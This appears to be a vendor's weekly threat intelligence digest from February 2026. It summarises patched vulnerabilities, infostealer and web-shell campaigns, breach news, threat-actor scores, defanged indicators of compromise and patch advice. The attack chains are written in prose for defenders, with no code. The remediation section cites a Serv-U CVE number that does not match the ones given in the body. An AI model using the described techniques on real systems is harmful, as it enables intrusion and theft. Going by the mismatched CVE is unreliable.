Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Motex Patches CVE-2026-25785 in LANSCOPE Endpoint Manager - On 25 February 2026, Motex issued a patch for CVE-2026-25785, a critical path traversal vulnerability affecting LANSCOPE Endpoint Manager On-Premise Edition in versions prior to 9.4.8.0. If successfully exploited, the flaw could allow threat actors to execute arbitrary code on affected systems, potentially leading to full system compromise.
The vulnerability has been addressed in version 9.4.8.0. At the time of writing, there have been no reports indicating that the issue has been actively exploited.
VMware Aria Operations Patches Three High-Severity Vulnerabilities (CVE-2026-22719, CVE-2026-22720, CVE-2026-22721) - On 24 February 2026, VMware (Broadcom) released patches for three high-severity vulnerabilities — CVE-2026-22719, CVE-2026-22720 and CVE-2026-22721 — affecting VMware Aria Operations. These vulnerabilities also impact VMware Cloud Foundation, VMware vSphere Foundation, VMware Telco Cloud Platform and VMware Telco Cloud Infrastructure, as these platforms incorporate and depend upon VMware Aria Operations.
To address the issues, VMware released VMware Cloud Foundation Operations 9.0.2.0 and VMware Aria Operations 8.18.6, together with update packages KB92148 and KB428241 for VMware Cloud Foundation, VMware Telco Cloud Platform and VMware Telco Cloud Infrastructure. At the time of writing, there have been no reports of active exploitation.
SolarWinds Patches Four Critical Serv-U Vulnerabilities CVE-2025-40538, CVE-2025-40539, CVE-2025-40540, and CVE-2025-40541 - On 24 February 2026, SolarWinds released version 15.5.4 of Serv-U, its managed file transfer (MFT) and FTP server solution, to address four critical vulnerabilities. At the time of writing, there were no reports of these issues being exploited in the wild. The flaws affect SolarWinds Serv-U and, if left unpatched, could result in serious system compromise.
CVE-2025-40538 is a broken access control vulnerability that could allow a threat actor to create a system administrator account and execute arbitrary code as root by leveraging domain administrator or group administrator privileges. CVE-2025-40539 and CVE-2025-40540 are critical type confusion vulnerabilities, both of which could enable the execution of arbitrary native code with root privileges. CVE-2025-40541 is a critical insecure direct object reference (IDOR) vulnerability that could allow a threat actor to execute native code as root.
Potential Threats
Threat Actors Use ClickFix-Style Fake Captcha Lures to Deliver Information-Stealing Malware - On 18 February 2026, CyberProof reported a Fake Captcha campaign deploying an unnamed information-stealing malware. The malware targeted browser credentials, machine information, gaming apps like Steam, cryptocurrency wallets, VPN settings, and FTP credentials. Analysts first detected the activity on 23 January 2026 after noticing suspicious clipboard access and unusual PowerShell execution on an endpoint. The campaign used compromised websites showing ClickFix-style captcha prompts, suggesting opportunistic targeting.
The attack began when users copied and executed a malicious PowerShell command from the fake captcha pages. This downloaded staged payloads, including a file named cptch.bin containing Donut-generated shellcode for in-memory execution. The malware then collected and exfiltrated data, injected code into legitimate processes such as svchost.exe to avoid detection, and deployed an additional payload, cptchbuild.bin, to bypass hash-based checks. It also modified the RunMRU registry key to maintain persistence across system reboots.
Threat Actors Exploit BeyondTrust Remote Support Vulnerability (CVE-2026-1731) to Deploy Web Shells, SparkRAT, and VShell - On 19 February 2026, Palo Alto Networks’ Unit 42 reported active exploitation of CVE-2026-1731, a critical pre-authentication remote code execution flaw in the “thin-scc-wrapper” Bash component of BeyondTrust Remote Support and Privileged Remote Access. Exploitation begins via a crafted WebSocket request with a malicious “remoteVersion” parameter that triggers Bash command substitution, allowing threat actors to execute arbitrary shell commands as the website user.
After gaining access, attackers perform reconnaissance, temporarily modify the primary administrator’s password hash, and deploy web shells for persistence. They manipulate Apache settings in memory, retrieve additional payloads, establish command-and-control with SparkRAT and VShell, and deploy tunnelling and monitoring tools for lateral movement. Finally, they exfiltrate configuration files, application data, and database dumps to attacker-controlled infrastructure.
KongTuke Deploys “Promise Bomb” Chrome Extensions to Crash Browsers and Trigger CrashFix Malware Delivery - On 22 February 2026, Annex Security reported new variants of the CrashFix campaign using a “Promise Bomb” technique in malicious Google Chrome extensions to intentionally crash browsers and prompt users to execute malware. The Promise Bomb DoS method overwhelms Chrome by creating millions of unresolved promises, causing the browser to crash. The campaign, attributed to the threat actor KongTuke, uses seemingly legitimate security-themed extensions such as “Pixel Shield – Block Ads” and “PageGuard – Phishing Protection” to deliver the payload. Pixel Shield, for example, clones uBlock Origin Lite but embeds code to trigger crashes and malware delivery.
Threat actors distribute these extensions via the Chrome Web Store under low-trust accounts, cloning legitimate projects to appear functional and gain positive ratings. Installed extensions register for Web Push notifications from attacker-controlled domains and establish push-based command-and-control, allowing remote activation. When triggered, the extensions execute a Promise Bomb—Pixel Shield generates 10 million promises and PageGuard 100 million—crashing Chrome. After the crash, a pop-up delivers a fake “CrashFix” message directing victims to copy and run a command that abuses a legitimate Windows binary to launch PowerShell, download further payloads, and execute malware.
General News
Reddit fined $20 million by UK for not effectively checking users’ ages - The U.K.’s data protection regulator has fined Reddit £14.47 million for failing to properly verify the age of children using the platform. The Information Commissioner’s Office (ICO) found that Reddit lacked adequate age assurance measures, meaning it collected and processed children’s data illegally. While Reddit introduced stronger checks for accessing mature content in July 2025, it continued to rely on users self-declaring their age when opening accounts—a method the ICO said is “easy to bypass” and insufficient to protect children under 13.
The ICO also noted that Reddit failed to conduct a data protection impact assessment before January 2025 to address risks to children, despite the platform being widely used by minors. The regulator said these shortcomings meant children’s data was processed unlawfully, potentially exposing them to harmful content. Reddit has argued that requiring additional personal information would conflict with its commitment to user privacy and safety and intends to appeal the fine. John Edwards, the U.K. information commissioner, emphasised that the ruling should serve as a warning to other companies relying on self-declaration for age verification, as it does not adequately protect children online.
Russian-speaking hackers used gen AI tools to compromise 600 firewalls - Earlier this year, a Russian-speaking threat actor used commercial generative AI tools to compromise over 600 Fortinet FortiGate firewalls across more than 55 countries, researchers have found. Running from mid-January to mid-February, the campaign exploited weak configurations rather than novel vulnerabilities, allowing a “low-to-medium-skilled” actor to operate at a scale normally seen with larger, more advanced groups. The attackers used AI services to generate attack plans, automate scripts, and manage operations, targeting exposed administrative access points and weak authentication on FortiGate devices.
Once inside, the group stole full device configurations, including passwords and network details, enabling deeper access to internal systems such as Active Directory and backup environments—potentially laying the groundwork for future ransomware attacks. Researchers noted that AI-generated tools automated most steps of the campaign but often failed against patched systems or basic defensive controls. The campaign appeared financially motivated and opportunistic, with no known links to state-backed groups. Experts warned that AI-augmented cyberattacks are likely to increase, as both skilled and unskilled actors leverage AI to enhance malware, automation, and reconnaissance.
PayPal discloses data breach that exposed user info for 6 months - PayPal has notified customers of a data exposure in its PayPal Working Capital (PPWC) loan application that lasted nearly six months last year. Due to a software error discovered on 12 December 2025, a small number of customers had their names, email addresses, phone numbers, business addresses, Social Security numbers, and dates of birth exposed between 1 July and 13 December 2025. The company reversed the code change responsible for the error the day after discovering the issue and has reset passwords for all affected accounts.
A limited number of unauthorised transactions were reported, and refunds have been issued. PayPal is offering two years of free three-bureau credit monitoring and identity restoration services through Equifax, with enrolment required by 30 June 2026. Customers are advised to monitor credit reports and account activity for suspicious transactions. PayPal emphasised that it never requests passwords or authentication codes via phone, text, or email. The company said that roughly 100 customers were impacted and clarified that its systems were not breached, with the incident arising from the software error rather than an external attack.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.
| ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity |
| Threat Actor | Severity Increase | Opportunity | Intent | ||||||
|---|---|---|---|---|---|---|---|---|---|
| ShinyHunters | ● Basic | → | ● Moderate | ● 49 | → | ● 49 | ● 35 | → | ● 54 |
| Dragon Force Group | ● Moderate | → | ● Moderate | ● 68 | → | ● 65 | ● 49 | → | ● 49 |
| Asian_Baddie | NEW | → | ● Basic | NEW | → | ● 30 | NEW | → | ● 31 |
| BR-UNC-030 | NEW | → | ● Basic | NEW | → | ● 35 | NEW | → | ● 25 |
| PYROXENE |
NEW | → | ● Basic | NEW | → | ● 30 | NEW | → | ● 30 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets | |||||
|---|---|---|---|---|---|---|---|---|
| Lazarus Group | ▲ | Disinformation | ▲ | CVE-2025-49113 | ▲ | Lawrence Wong | ▲ | |
| ShinyHunters | ▲ | EVEREST Ransomware | ▲ | CVE-2026-25108 | ▲ | Singapore Government | ▲ | |
| Handala Hack Team | ▲ | Vishing | ▲ | CVE-2025-68461 | ▲ | Wynn Resorts | ▲ | |
| UnsolicitedBooker | ▲ |
MarsSnake |
▲ | CVE-2026-1731 | ▲ | Conduent | ▲ | |
| KongTuke | ▲ | Information Leakage | ▲ | CVE-2018-0802 | ▲ | Fortinet | ▲ | |
Prominent Information Security Events
Threat Actors Use ClickFix-Style Fake Captcha Lures to Deliver Information-Stealing Malware
Source: Insikt Group | Validated Intelligence Event
IOC: Hash - f50846dcf09e0c7ce582040fb128ebf3
IOC: URL - 94[.]154[.]35[.]115
On 18 February 2026, CyberProof reported a Fake Captcha campaign in which threat actors deployed an unnamed information-stealing malware. The malware targeted browser credentials, system information, data from gaming applications like Steam, cryptocurrency wallets, VPN configurations, and FTP credentials. The campaign used compromised websites displaying ClickFix-style captcha prompts, suggesting opportunistic targeting. Analysts first identified the activity on 23 January 2026 after observing unusual clipboard access and abnormal PowerShell execution on an endpoint.
The attackers began by compromising legitimate websites and embedding fake captcha pages. When users visited these sites, they were instructed to copy and execute a PowerShell command through the Windows command line. This command then downloaded staged payloads from external servers and retrieved a file named cptch.bin, which contained shellcode generated with Donut, an open-source offensive security tool, enabling the malware to run directly in memory.
Once deployed, the malware carried out reconnaissance and exfiltrated sensitive data. It injected its code into legitimate processes such as svchost.exe to avoid detection and deployed an additional payload, cptchbuild.bin, to bypass hash-based security checks. To maintain persistence across system reboots, the malware modified the RunMRU registry key to ensure PowerShell execution at startup.
Threat Actors exploit BeyondTrust Remote Support Vulnerability (CVE-2026-1731) to Deploy Web Shells, SparkRAT, and VShell
Source: Insikt Group | Validated Intelligence Event
IOC: Hash - 9f431d5549a03aee92cfd2bdbbe90f1c91e965c99e90a0c9ad5a001f4e80c350
IOC: IP - 45[.]61[.]150[.]96
On 19 February 2026, Palo Alto Networks’ Unit 42 published a technical analysis detailing the active exploitation of CVE-2026-1731, a critical pre-authentication remote code execution vulnerability affecting the “thin-scc-wrapper” Bash component in BeyondTrust Remote Support and Privileged Remote Access. The flaw allows unauthenticated threat actors to execute operating system commands as the website user, potentially leading to full system compromise. Exploitation begins with a crafted WebSocket request containing a malicious “remoteVersion” parameter designed to trigger Bash command substitution and arbitrary shell execution.
After achieving code execution, the attackers conduct reconnaissance to gather host and domain information, then temporarily overwrite the primary administrator’s password hash using a custom Python script to gain elevated access. They deploy multiple web shells for persistence, including simple PHP backdoors and more advanced variants, and manipulate Apache configuration settings in memory to retain control while minimising forensic traces. Additional payloads are retrieved and executed to expand access and establish longer-term footholds.
The threat actors then deploy remote access tools including SparkRAT and VShell to establish command-and-control and maintain persistence, while also attempting reverse shell connections. They use tunnelling and monitoring tools to enable lateral movement within compromised environments and employ DNS-based techniques to validate exploitation and fingerprint hosts. Finally, they stage configuration files, internal application data, and PostgreSQL database dumps for compression and exfiltration to attacker-controlled infrastructure.
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
-
CVE-2026-25785 (LANSCOPE Endpoint Manager) – This vulnerability can be addressed by upgrading to version 9.4.8.0.
-
CVE-2026-22719, CVE-2026-22720, CVE-2026-22721 (VMware Aria) – These vulnerabilites can be addressed by updating to VMware Cloud Foundation Operations 9.0.2.0 and VMware Aria Operations 8.18.6.
-
CVE-2026-2447 (SolarWinds Serv-U) – These vulnerabilities can be addressed by updating SolarWindws Serv-U to version 15.5.4.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.